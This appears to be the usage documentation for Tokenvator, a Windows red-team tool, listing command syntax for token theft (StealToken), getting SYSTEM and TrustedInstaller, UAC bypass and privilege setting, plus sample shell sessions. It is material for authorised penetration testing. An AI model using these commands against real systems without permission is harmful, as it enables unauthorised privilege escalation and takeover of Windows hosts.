Tokenvator

A tool to elevate privilege with Windows Tokens

This tool has two methods of operation – interactive and argument modes

Interactive Mode:
C:> tokenvator.exe
(Tokens) > steal_token 908 cmd.exe
(Tokens) >

Arguments Mode:
C:> tokenvator.exe steal_token 908 cmd.exe
C:>

Methods

• GetSystem

  • Optional Parameters: Process ID, Command
  • Examples:
    (Tokens) > GetSystem
    or
    (Tokens) > GetSystem 504
    or
    (Tokens) > GetSystem 504 regedit.exe

• GetTrustedInstaller

  • Optional Parameters: Command
  • Examples:
    (Tokens) > GetTrustedInstaller
    or
    (Tokens) > GetTrustedInstaller regedit.exe

• Steal_Token

  • Parameters: Process ID
  • Optional Parameters: Command
  • Examples:
    (Tokens) > StealToken 1008
    or
    (Tokens) > StealToken calc regedit.exe
    or
    (Tokens) > StealToken 1008 regedit.exe

• BypassUAC

  • Parameters: Process ID
  • Optional Parameters: Command
  • Examples:
    (Tokens) > BypassUAC 1008
    or
    (Tokens) > BypassUAC regedit.exe
    or
    (Tokens) > BypassUAC 1008 regedit.exe

• List_Privileges

  • Parameters: –
  • Optional Parameters: –
  • Examples:
    (Tokens) > List_Privileges

• Set_Privileges

  • Parameters: Privilege
  • Optional Parameters: –
  • Examples:
    (Tokens) > Set_Privileges SeSecurityPrivilege

• List_Processes

  • Parameters: –
  • Optional Parameters: –
  • Examples:
    (Tokens) > List_Processes

• List_Processes_WMI

  • Parameters: –
  • Optional Parameters: –
  • Examples:
    (Tokens) > List_Processes_WMI

• Find_User_Processes

  • Parameters: Username
  • Optional Parameters: –
  • Examples:
    (Tokens) > Find_User_Processes domain\user

• Find_User_Processes_WMI

  • Parameters: Username
  • Optional Parameters: –
  • Examples:
    (Tokens) > Find_User_Processes_WMI domain\user

• List_User_Sessions

  • Parameters: –
  • Optional Parameters: –
  • Examples:
    (Tokens) > List_User_Sessions

• WhoAmI

  • Parameters: –
  • Optional Parameters: –
  • Examples:
    (Tokens) > WhoAmI

• RevertToSelf

  • Parameters: –
  • Optional Parameters: –
  • Examples:
    (Tokens) > RevertToSelf

• Run

  • Parameters: Command
  • Optional Parameters: –
  • Examples:
    (Tokens) > Run cmd.exe

Changelog v2.1.1

• Update to add support for interactive sub-processes

  (Tokens) > run cmd.exe
  [+] Starting cmd.exe
  [*] Note: The prompt is currently missing for input
  
  Microsoft Windows [Version 10.0.17763.379]
  (c) 2018 Microsoft Corporation. All rights reserved.
  
  whoami
  C:\Tokenvator\Tokenvator\bin\Release-Net45>whoami
  windows10pro\0xbadjuju
  
  dir
  C:\Tokenvator\Tokenvator\bin\Release-Net45>dir
   Volume in drive C has no label.
   Volume Serial Number is A624-B8DD
  
   Directory of C:\Tokenvator\Tokenvator\bin\Release-Net45
  
  03/22/2019  11:38 AM    <DIR>          .
  03/22/2019  11:38 AM    <DIR>          ..
  09/15/2018  02:29 AM         3,010,560 System.Management.Automation.dll
  02/21/2019  11:45 AM               161 Tokenvator.exe.config
  03/22/2019  11:28 AM           112,128 Tokenvator.pdb
  03/22/2019  11:28 AM           117,760 Tokenvator.exe
                 4 File(s)      3,240,609 bytes
                 2 Dir(s)  84,676,734,976 bytes free
  
  exit
  C:\Tokenvator\Tokenvator\bin\Release-Net45>exit
  
  (Tokens) > run powershell.exe
  [+] Starting powershell.exe
  [*] Note: The prompt is currently missing for input
  
  Windows PowerShell
  Copyright (C) Microsoft Corporation. All rights reserved.
  
  gci
  PS C:\Tokenvator\Tokenvator\bin\Release-Net45> gci
  
  
      Directory: C:\Tokenvator\Tokenvator\bin\Release-Net45
  
  
  Mode                LastWriteTime         Length Name
  ----                -------------         ------ ----
  -a----        9/15/2018   2:29 AM        3010560 System.Management.Automation.dll
  -a----        2/21/2019  10:45 AM            161 Tokenvator.exe.config
  -a----        3/22/2019  11:28 AM         112128 Tokenvator.pdb
  -a----        3/22/2019  11:28 AM         117760 Tokenvator.exe
  
  
  exit
  PS C:\Tokenvator\Tokenvator\bin\Release-Net45> exit

Download

Copyright (C) Alexander Leary (@0xbadjuju), NetSPI – 2018

Source: https://github.com/0xbadjuju/